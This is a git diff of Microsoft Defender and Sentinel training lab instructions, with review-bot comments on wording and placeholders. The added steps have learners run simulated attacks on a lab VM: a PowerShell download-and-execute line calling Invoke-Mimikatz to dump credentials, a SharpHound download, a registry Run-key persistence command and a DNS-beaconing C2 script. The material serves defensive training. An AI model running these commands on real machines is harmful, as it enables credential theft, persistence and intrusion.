diff --git a/Instructions/Labs/LAB_AK_02_Lab1_Ex2_Mitigate_Attacks.md b/Instructions/Labs/LAB_AK_02_Lab1_Ex2_Mitigate_Attacks.md index 8db70f57..d7548f62 100644 --- a/Instructions/Labs/LAB_AK_02_Lab1_Ex2_Mitigate_Attacks.md +++ b/Instructions/Labs/LAB_AK_02_Lab1_Ex2_Mitigate_Attacks.md @@ -14,7 +14,6 @@ You are a Security Operations Analyst working at a company that is implementing To explore the Defender for Endpoint attack mitigation capabilities, you will run two simulated attacks. - >**Note:** An **[interactive lab simulation](https://mslabs.cloudguides.com/guides/SC-200%20Lab%20Simulation%20-%20Mitigate%20attacks%20with%20Microsoft%20Defender%20for%20Endpoint)** is available that allows you to click through this lab at your own pace. You may find slight differences between the interactive simulation and the hosted lab, but the core concepts and ideas being demonstrated are the same. @@ -22,7 +21,7 @@ To explore the Defender for Endpoint attack mitigation capabilities, you will ru In this task, you will confirm that the device is onboarded successfully and create a test alert. -1. If you are not already at the Microsoft 365 Defender portal in your Microsoft Edge browser, go to (https://security.microsoft.com) and login as Admin for your tenant. +1. If you are not already at the Microsoft Defender XDR portal in your Microsoft Edge browser, go to (https://security.microsoft.com) and login as Admin for your tenant. 1. In the left-hand menu, under the **Assets** area, select **Devices**. Please wait until WIN1 appears in the Devices page before you continue. Otherwise, you might need to repeat this task to see the alerts that will be generated later. 
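Review bot: In the rewritten step `go to (https://security.microsoft.com) and login as Admin for your tenant`, `login` is the noun; the verb form is `log in`. The hunk already touches this line for the Microsoft Defender XDR rename, so fix it here rather than in a follow-up. Two minor consistency points in the same hunk: the URL is wrapped in bare parentheses instead of a Markdown link, and the trailing context refers to the device as `WIN1` while the Task 3 note added later in this patch calls it `*win1*`; pick one spelling for the device name across the file.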
@@ -38,14 +37,52 @@ In this task, you will confirm that the device is onboarded successfully and cre 1. When the "User Account Control" window is shown, select **Yes** to allow the app to run. -1. Paste the script by right-clicking in the **Administrator: Command Prompt** windows and press **Enter** to run it. **Note:** The window closes automatically after running the script. +1. Paste the script by right-clicking in the **Administrator: Command Prompt** windows and press **Enter** to run it. + >**Note:** The window closes automatically after running the script. ### Task 2: Simulated Attacks -In this task, you will run two simulated attacks to explore the capabilities of Microsoft Defender for Endpoint. +In this task, you will run two *simulated* attacks using *PowerShell* on *WIN1* to explore the capabilities of Microsoft Defender for Endpoint. + +`Attack 1: Mimikatz - Credential Dumping` + +1. On the *WIN1* machine, type **Command** in the search bar and select **Run as administrator**. + +1. Copy and paste the following command in the **Administrator: Command Prompt** window and press **Enter** to run it. + + ```CommandPrompt + powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds" + ``` + +1. You should see a message that says *Access is denied*, and a pop-up message from `Microsoft Defender Antivirus, Windows Security Virus and threats protection` displaying *Threats found*. + +1. Exit the **Administrator: Command Prompt** window by typing **exit** and pressing **Enter**. + +`Attack 2: Bloodhound - Collection` + +1. On the *WIN1* machine, type **PowerShell** in the search bar, select **Windows PowerShell** and select **Run as administrator**. -1. From the left menu, under **Endpoints**, select **Evaluation & tutorials** and then select **Tutorials & simulations** from the left side. +1. Copy and paste the following commands in the **Administrator: Windows PowerShell** window and press **Enter** to run it. 
+ + ```PowerShell + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1" + ``` + + >**Note:** It is recommended to copy, paste and run the commands one at a time. You can open *Notepad* and copy the commands into a temporary file to accomplish this. The first command creates a folder named *ExternalPayloads* in the same folder where the *Atomic Red Team* folder is located. The second command downloads the *SharpHound.ps1* file from the *BloodHound* GitHub repository and saves it in the *ExternalPayloads* folder. + +1. You should see a pop-up message from `Windows Security Virus and threats protection` displaying *Threats found*. + +1. Copy and paste the following command in the **Administrator: Windows PowerShell** window and press **Enter** to run it. + + ```PowerShell + Test-Path "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1" + ``` + +1. If the output is *True*, the Malware payload file has not been removed by Microsoft Defender Antivirus. If the output is *False*, the Malware payload file has been removed by Microsoft Defender Antivirus. Use the up-arrow key to repeat the command until the output is *False*. + + - +1. Repeat the last 3 steps to run another tutorial, *Automated investigation (fileless attack)*. This is no longer working due to win1 AV ---> ### Task 3: Investigate the Attacks -1. In the Microsoft 365 Defender portal select **Incidents & alerts** from the left menu bar, then select **Incidents**. +1. In the Microsoft Defender XDR portal select **Incidents & alerts** from the left menu bar, then select **Incidents**. -1. A new incident called "Multi-stage incident..." is in the right pane. Select the incident name to load its details. +1. 
A new incident called "Multiple threat families detected on one endpoint" is in the right pane. Select the incident name to load its details. - >**Note:** An incident called "Suspicious..." might appear first. This will later be replaced with the aforementioned incident when Microsoft 365 Defender correlates them a single security issue, including the original test alert created in Task 1. + >**Note:** You should see both *Bloodhound* and Mimikatz* alerts in the **Alerts** pane. In **Assets/Devices**, the *win1* computer will now have a **Risk level** of *High*.. 1. Select the **Manage incident** button and a new window blade appears. -1. Under **Incident tags** type "Tutorial" and select **Tutorial (Create new)** to create a new tag. +1. Under **Incident tags** type "Simulation" and select **Simulation (Create new)** to create a new tag. 1. Select the toggle **Assign to** and add your user account (Me) as owner of the incident. 
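Review bot: The Mimikatz command under `Attack 1: Mimikatz - Credential Dumping` still carries the unresolved Atomic Red Team input placeholder `'#{mimurl}'`, and both SharpHound commands under `Attack 2: Bloodhound - Collection` use the unresolved `PathToAtomicsFolder` variable, so the accompanying note ("creates a folder named *ExternalPayloads* in the same folder where the *Atomic Red Team* folder is located") does not describe what a learner who pastes these lines verbatim gets: `PathToAtomicsFolder\..\ExternalPayloads\` resolves relative to the current directory of the elevated PowerShell window, and nothing in this lab installs Atomic Red Team on WIN1. The expected result for Attack 1 is *Access is denied* plus a *Threats found* pop-up rather than a completed download, which suggests the unresolved placeholder is acceptable for the detection the lab wants to show; if so, say that in the note, otherwise replace the placeholders with an explicit path such as `C:\Temp\ExternalPayloads\` and reword the note to match. Two smaller points in the same hunk: the line `1. Repeat the last 3 steps to run another tutorial, *Automated investigation (fileless attack)*. This is no longer working due to win1 AV --->` is a stale remark about the tutorial flow this hunk removes, and it ends in a dangling `--->` with no matching `<!--`; drop the line or make it a complete `<!-- ... -->` comment. In the Task 3 note, `*Bloodhound* and Mimikatz* alerts` is missing the opening asterisk on `*Mimikatz*`, and `*High*..` has a doubled period.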
@@ -78,6 +114,6 @@ In this task, you will run two simulated attacks to explore the capabilities of 1. Review the contents of the *Attack story, Alerts, Assets, Investigations, Evidence and Response*, and *Summary* tabs. Devices and Users are under the *Assets* tab. The *Attack story* tab displays the *Incident graph*. The **Hint:** Some tabs might be hidden due the size of your display. Select the ellipsis tab (...) to make them appear. ->**Warning:** The simulations and tutorials here are an excellent source of learning through practice. Simulations and tutorials are being added and edited regularly in the portal. However, some of these simulations & tutorials may interfere with performance of the labs designed for this training course. Only perform the simulations and tutorials recommended in the instructions provided for this lab when using the course provided Azure tenant. You may perform the other simulations and tutorials *after* this training course is complete with this tenant. + >**Warning:** The simulated attacks here are an excellent source of learning through practice. Only perform the attacks in the instructions provided for this lab when using the course provided Azure tenant. You may perform other simulated attacks *after* this training course is complete with this tenant. ## You have completed the lab. diff --git a/Instructions/Labs/LAB_AK_03_Lab1_Ex2_Azure_Defender.md b/Instructions/Labs/LAB_AK_03_Lab1_Ex2_Azure_Defender.md index 89f51247..f2e060ec 100644 --- a/Instructions/Labs/LAB_AK_03_Lab1_Ex2_Azure_Defender.md +++ b/Instructions/Labs/LAB_AK_03_Lab1_Ex2_Azure_Defender.md 
@@ -37,22 +37,23 @@ In this task, you will review Regulatory compliance configuration in Microsoft D 1. Select your subscription. -1. Under *Policy settings*, select **Security policy** in the portal menu. + >**Hint:** Select **Expand all** to find your subscription if you a hierarchy of Management Groups. -1. Scroll down and and review the "Industry & regulatory standards" available to you by default. Note that *ISO 27001* is now deprecated. +1. Under *Settings*, select **Security policy** in the portal menu. -1. Select **Add more standards** to add the updated ISO 27001:2013 regulatory standard. +1. Scroll down and and review the "Security standards" available to you by default. -1. Select the **Add** button to right of *ISO 27001:2013*. +1. Use the search box to find *ISO 27001:2013*. -1. A new page to assign the Azure Policy initiative opens. Confirm that your subscription is selected under *Scope* and click **Review and create**. +1. Select and move the **Status** slider to right of *ISO 27001:2013* to **On**. -1. Select **Create** to assign the Azure Policy initiative to your subscription. + >**Note:** Some standards require you to assign ane Azure Policy initiative. -1. Select Microsoft Defender for Cloud below the search box to return to the main blade. +1. Select **Refresh** on the page menu to confirm that *ISO 27001:2013* is set to *On* for your subscription. - >**Note:** You might want to return later to *Regulatory compliance* to review the new standard controls and recommendations. +1. Close the *Security policies* page by selecting the 'X' on the upper right of the page to go back to the **Environment settings**. + >**Note:** You might want to return later to *Regulatory compliance* to review the new standard controls and recommendations. ### Task 2: Explore Security posture and recommendations 
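Review bot: The rewritten Security policy steps drop the assignment flow (the removed `Review and create` and `Create` steps), but the new note `Some standards require you to assign ane Azure Policy initiative` gives the learner nothing to do when that applies to *ISO 27001:2013*; either add the step or state that the assignment dialog opens when the **Status** slider is set to **On**. Typos in the added lines: `if you a hierarchy of Management Groups` (missing "have"), `Scroll down and and review` (doubled "and"), `assign ane Azure Policy` ("an"), and `slider to right of` (missing "the"). Also, `Select **Refresh** on the page menu to confirm that *ISO 27001:2013* is set to *On*` reads as a verification step; if the toggle can take time to apply, say so, since the learner otherwise has no way to tell a pending change from a failed one.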
diff --git a/Instructions/Labs/LAB_AK_06_Lab1_Ex1_Connect_Services.md b/Instructions/Labs/LAB_AK_06_Lab1_Ex1_Connect_Services.md index 7f9272ff..e735dd1e 100644 --- a/Instructions/Labs/LAB_AK_06_Lab1_Ex1_Connect_Services.md +++ b/Instructions/Labs/LAB_AK_06_Lab1_Ex1_Connect_Services.md @@ -37,7 +37,7 @@ In this task, you will access your Microsoft Sentinel workspace. 1. Select *Create incidents based on Microsoft Defender for Cloud* from the rule templates. -1. Select **Create rule** in the connector information blade. +1. Select **Create rule** in the rule information pane, or select the ellipsis (...) and **+ Create rule**. 1. In the Analytics rule wizard, select **Next: Automated response**, then select **Next: Review and create**. diff --git a/Instructions/VTD_Demos/00-prerequisites.md b/Instructions/VTD_Demos/00-prerequisites.md index a1a5be35..9dbd4ec0 100644 --- a/Instructions/VTD_Demos/00-prerequisites.md +++ b/Instructions/VTD_Demos/00-prerequisites.md 
@@ -581,98 +581,98 @@ In this task, you will perform attacks on a host with Microsoft Defender for End 1. In the search of the task bar, enter *Command*. Command Prompt will be displayed in the search results. Right-click on the Command Prompt and select **Run as Administrator**. Confirm any User Account Control prompts that appear. 1. In the command prompt, enter the command in each row pressing Enter key after each row: -``` -cd \ -mkdir temp -cd temp -``` + + ```CommandPrompt + cd \ + mkdir temp + cd temp + ``` 1. Copy and run this command: -``` -REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "SOC Test" /t REG_SZ /F /D "C:\temp\startup.bat" -``` + ```CommandPrompt + REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "SOC Test" /t REG_SZ /F /D "C:\temp\startup.bat" + ``` ### Task 2: Create C2 (command and control) attack 1. Login to `WIN1` virtual machine as Admin with the password: **Pa55w.rd**. 1. In the search of the task bar, enter *Command*. Command Prompt will be displayed in the search results. Right-click on the Command Prompt and select **Run as Administrator**. Confirm any User Account Control prompts that appear. -1. -1. -1. Attack 2 - Copy and run this command: - -``` -notepad c2.ps1 -``` -Select **Yes** to create a new file and copy the following PowerShell script into c2.ps1 and select **save**. - -**Note** Paste into the Virtual Machine might have a limited length. Paste this in three sections to ensure all the script is pasted into the Virtual Machine. Make sure the script looks as it does in these instructions within the notepad c2.ps1 file. - -``` - - -param( - [string]$Domain = "microsoft.com", - [string]$Subdomain = "subdomain", - [string]$Sub2domain = "sub2domain", - [string]$Sub3domain = "sub3domain", - [string]$QueryType = "TXT", - [int]$C2Interval = 8, - [int]$C2Jitter = 20, - [int]$RunTime = 240 -) +1. 
Attack 2 - Copy and run this command: -$RunStart = Get-Date -$RunEnd = $RunStart.addminutes($RunTime) + ```CommandPrompt + notepad c2.ps1 + ``` -$x2 = 1 -$x3 = 1 -Do { - $TimeNow = Get-Date - Resolve-DnsName -type $QueryType $Subdomain".$(Get-Random -Minimum 1 -Maximum 999999)."$Domain -QuickTimeout +Select **Yes** to create a new file and copy the following PowerShell script into c2.ps1 and select **save**. - if ($x2 -eq 3 ) - { - Resolve-DnsName -type $QueryType $Sub2domain".$(Get-Random -Minimum 1 -Maximum 999999)."$Domain -QuickTimeout - - $x2 = 1 +>**Note:** Paste into the Virtual Machine might have a limited length. Paste this in three sections to ensure all the script is pasted into the Virtual Machine. Make sure the script looks as it does in these instructions within the notepad c2.ps1 file. - } - else - { - $x2 = $x2 + 1 - } + ```PowerShell - if ($x3 -eq 7 ) - { - - Resolve-DnsName -type $QueryType $Sub3domain".$(Get-Random -Minimum 1 -Maximum 999999)."$Domain -QuickTimeout - - $x3 = 1 + param( + [string]$Domain = "microsoft.com", + [string]$Subdomain = "subdomain", + [string]$Sub2domain = "sub2domain", + [string]$Sub3domain = "sub3domain", + [string]$QueryType = "TXT", + [int]$C2Interval = 8, + [int]$C2Jitter = 20, + [int]$RunTime = 240 + ) + + + $RunStart = Get-Date + $RunEnd = $RunStart.addminutes($RunTime) + + $x2 = 1 + $x3 = 1 + Do { + $TimeNow = Get-Date + Resolve-DnsName -type $QueryType $Subdomain".$(Get-Random -Minimum 1 -Maximum 999999)."$Domain -QuickTimeout + + if ($x2 -eq 3 ) + { + Resolve-DnsName -type $QueryType $Sub2domain".$(Get-Random -Minimum 1 -Maximum 999999)."$Domain -QuickTimeout + + $x2 = 1 + + } + else + { + $x2 = $x2 + 1 + } + if ($x3 -eq 7 ) + { + + Resolve-DnsName -type $QueryType $Sub3domain".$(Get-Random -Minimum 1 -Maximum 999999)."$Domain -QuickTimeout + + $x3 = 1 + + } + else + { + $x3 = $x3 + 1 + } + + + $Jitter = ((Get-Random -Minimum -$C2Jitter -Maximum $C2Jitter) / 100 + 1) +$C2Interval + Start-Sleep -Seconds $Jitter } 
- else - { - $x3 = $x3 + 1 - } - + Until ($TimeNow -ge $RunEnd) + ``` - $Jitter = ((Get-Random -Minimum -$C2Jitter -Maximum $C2Jitter) / 100 + 1) +$C2Interval - Start-Sleep -Seconds $Jitter -} -Until ($TimeNow -ge $RunEnd) +At the command prompt, enter the following, enter the command in each row pressing Enter key after each row: -``` + ```PowerShell + .\c2.ps1 + ``` -At the command prompt, enter the following, enter the command in each row pressing Enter key after each row: -``` -powershell -.\c2.ps1 -``` -**Note:** You will see resolve errors. This is to be expected. -Let this command/powershell script run in the background. Don't close the window. The command needs to generate log entries for some hours. You can proceed to the next task and next exercises while this script runs. The data created by this task will be used in the Threat Hunting lab later. This process will not create substantial amounts of data or processing. +>**Note:** You will see resolve errors. This is to be expected. + Let this command/powershell script run in the background. Don't close the window. The command needs to generate log entries for some hours. You can proceed to the next task and next exercises while this script runs. The data created by this task will be used in the Threat Hunting lab later. This process will not create substantial amounts of data or processing. ### Task 2: Attack Windows configured with the Azure Monitor Agent (AMA) @@ -692,6 +692,6 @@ In this task, you will perform attacks on a host with the Security Events connec net localgroup administrators theusernametoadd /add ``` ->**Note**: Make sure there is only one command per line, and you can rerun the commands by changing the username. + >**Note**: Make sure there is only one command per line, and you can rerun the commands by changing the username. 1. In the `Output` window you should see `The command completed successfully` three times 
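Review bot: The run step at the end of this hunk drops the `powershell` line that the old version typed before `.\c2.ps1`, while the surrounding text still says the learner is in the Administrator Command Prompt; typing `.\c2.ps1` into cmd.exe opens the file with its associated application instead of running the script. Either keep the `powershell` line in the `CommandPrompt` block or change the text to say the script is started from a PowerShell window. Related wording: "enter the following, enter the command in each row pressing Enter key after each row" now introduces a single-line block. Indentation inside the hunk is mixed: the fenced blocks and the `>**Note:**` paste notice are indented three spaces as list-item children, while `Select **Yes** to create a new file ...` and `At the command prompt, enter the following ...` sit at column zero, which ends the numbered list in rendered Markdown. One observation on the script body, which is only re-indented here: the parameter name `$C2Jitter = 20` reads as a percentage, but `$Jitter = ((Get-Random -Minimum -$C2Jitter -Maximum $C2Jitter) / 100 + 1) +$C2Interval` adds the factor to the interval rather than scaling it, so the sleep is always `$C2Interval` plus roughly 0.8 to 1.2 seconds. That is fine for generating log entries over a few hours, but a comment in the script or the note should say what the parameter actually does so learners reading the DNS timing in the Threat Hunting lab are not misled.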
diff --git a/Instructions/VTD_Demos/02-mitigate-threats-defender-for-endpoint.md b/Instructions/VTD_Demos/02-mitigate-threats-defender-for-endpoint.md index d6b79234..92607afe 100644 --- a/Instructions/VTD_Demos/02-mitigate-threats-defender-for-endpoint.md +++ b/Instructions/VTD_Demos/02-mitigate-threats-defender-for-endpoint.md 
@@ -4,20 +4,47 @@ ## Simulated Attacks -In this task, you will run one simulated attack to explore the capabilities of Microsoft Defender for Endpoint. +In this task, you will run two simulated attack to explore the capabilities of Microsoft Defender for Endpoint. -1. If you are not already at the Microsoft Defender Security Center in your browser, go to the Microsoft Defender Security Center at (https://security.microsoft.com) logged in as Admin for your tenant. +1. If you are not already at the Microsoft Defender XDR portal in your browser, go to Microsoft Defender XDR at (https://security.microsoft.com) logged in as Admin for your tenant. -1. From the menu, under **Endpoints**, select **Evaluation & tutorials** and then select **Tutorials & simulations** from the left side. +You will run the *simulated* attacks using *PowerShell* on *WIN1* to explore the capabilities of Microsoft Defender for Endpoint. -1. Select the **Tutorials** tab. +`Attack 1: Mimikatz - Credential Dumping` -1. Under *Automated investigation (backdoor)* you will see a message describing the scenario. Below this paragraph, click **Read the walkthrough**. A new browser tab opens which includes instructions to perform the simulation. +1. On the *WIN1* machine, type **Command** in the search bar and select **Run as administrator**. -1. In the new browser tab, locate the section named **Run the simulation** (page 5, starting at step 2) and follow the steps to run the attack. **Hint:** The simulation file *RS4_WinATP-Intro-Invoice.docm* can be found back in portal, just below the **Read the walkthrough** you selected in the previous step by selecting the **Get simulation file** button. +1. Copy and paste the following command in the **Administrator: Command Prompt** window and press **Enter** to run it. - 1. 
**Note:** After executing the file with the exploit, you can return to the [Microsoft 365 Defender Security Center](https://security.microsoft.com) and click on the **Incidents** tab to see the alerts. The guide incorrectly references the *Microsoft Defender ATP portal* which has been migrated and rebranded. - 1. Open the incident page and click **Manage Incident**. Click **Resolve incident** to resolve all of the active alerts. + ```CommandPrompt + powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds" + ``` +1. You should see a message that says *Access is denied*, and a pop-up message from `Microsoft Defender Antivirus, Windows Security Virus and threats protection` displaying *Threats found*. + +1. Exit the **Administrator: Command Prompt** window by typing **exit** and pressing **Enter**. + +`Attack 2: Bloodhound - Collection` + +1. On the *WIN1* machine, type **PowerShell** in the search bar, select **Windows PowerShell** and select **Run as administrator**. + +1. Copy and paste the following commands in the **Administrator: Windows PowerShell** window and press **Enter** to run it. + + ```PowerShell + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1" + ``` + + >**Note:** It is recommended to copy, paste and run the commands one at a time. You can open *Notepad* and copy the commands into a temporary file to accomplish this. The first command creates a folder named *ExternalPayloads* in the same folder where the *Atomic Red Team* folder is located. The second command downloads the *SharpHound.ps1* file from the *BloodHound* GitHub repository and saves it in the *ExternalPayloads* folder. + +1. 
You should see a pop-up message from `Windows Security Virus and threats protection` displaying *Threats found*. + +1. Copy and paste the following command in the **Administrator: Windows PowerShell** window and press **Enter** to run it. + + ```PowerShell + Test-Path "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1" + ``` + +1. If the output is *True*, the Malware payload file has not been removed by Microsoft Defender Antivirus. If the output is *False*, the Malware payload file has been removed by Microsoft Defender Antivirus. Use the up-arrow key to repeat the command until the output is *False*. ## You have completed the Demo
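Review bot: The rewritten intro line `you will run two simulated attack to explore` needs the plural `attacks`. This hunk is a verbatim copy of Task 2 from `LAB_AK_02_Lab1_Ex2_Mitigate_Attacks.md` in the same patch, unresolved placeholders included (`'#{mimurl}'` in the Mimikatz command and `PathToAtomicsFolder` in both SharpHound commands), so whatever is decided there about resolving or explaining those placeholders must be applied here as well; consider having this demo link to the lab file rather than maintaining two copies that will drift. Also, `You will run the *simulated* attacks using *PowerShell* on *WIN1* ...` is inserted at column zero between two numbered items, which ends the first list and restarts numbering at the next `1.`; either indent it as part of the preceding item or merge it into the intro sentence at the top of the section. Finally, "press **Enter** to run it" under `Attack 2` refers to two commands; the note below already recommends running them one at a time, so say "run them" or restructure as two steps.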